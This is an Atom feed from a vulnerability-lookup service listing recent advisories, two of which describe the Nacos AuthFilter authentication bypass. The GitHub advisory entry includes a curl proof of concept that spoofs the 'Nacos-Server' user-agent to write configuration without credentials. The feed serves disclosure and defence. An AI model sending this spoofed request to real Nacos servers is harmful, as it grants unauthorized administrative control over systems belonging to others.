<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-03T10:53:15.943440+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/bdu:2021-04178</id>
    <title>bdu:2021-04178</title>
    <updated>2026-10-03T10:53:16.002175+00:00</updated>
    <content>bdu:2021-04178</content>
    <link href="https://cve.radiocsirt.org/vuln/bdu:2021-04178"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-26359</id>
    <title>EUVD-2026-26359</title>
    <updated>2026-10-03T10:53:16.002214+00:00</updated>
    <content>EUVD-2026-26359</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-26359"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2021-29441</id>
    <title>fkie_cve-2021-29441</title>
    <updated>2026-10-03T10:53:16.002228+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true) Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header so it can be easily spoofed. This issue may allow any user to carry out any administrative tasks on the Nacos server.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2021-29441"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-36hp-jr8h-556f</id>
    <title>GHSA-36hp-jr8h-556f — Authentication Bypass</title>
    <updated>2026-10-03T10:53:16.002260+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Maven: com.alibaba.nacos:nacos-common</p>
<p>When configured to use authentication (`-Dnacos.core.auth.enabled=true`) Nacos uses the `AuthFilter` servlet filter to enforce authentication. This filter has a [backdoor](https://github.com/alibaba/nacos/blob/5fa05aef52f7432aeab19fe53035431b9d8c91d9/core/src/main/java/com/alibaba/nacos/core/auth/AuthFilter.java#L78-L81) that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the `user-agent` HTTP header so it can be easily spoofed.</p>
<p>The following request to the `configuration` endpoint gets rejected as we are not providing any credentials:
```
❯ curl -X POST "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&amp;group=foo&amp;content=helloWorld"
{"timestamp":"2020-12-02T14:33:57.154+0000","status":403,"error":"Forbidden","message":"unknown user!","path":"/nacos/v1/cs/configs"}                                                                                                       
```</p>
<p>However the following one gets accepted by using the `Nacos-Server` user-agent header:
```
❯ curl -X POST -A Nacos-Server "http://127.0.0.1:8848/nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&amp;group=foo&amp;content=helloWorld"
true 
```</p>
<p>#### Impact</p>
<p>This issue may allow any user to carry out any administrative tasks on the Nacos server.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-36hp-jr8h-556f"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/gsd-2021-29441</id>
    <title>gsd-2021-29441</title>
    <updated>2026-10-03T10:53:16.002302+00:00</updated>
    <content>gsd-2021-29441</content>
    <link href="https://cve.radiocsirt.org/vuln/gsd-2021-29441"/>
  </entry>
</feed>
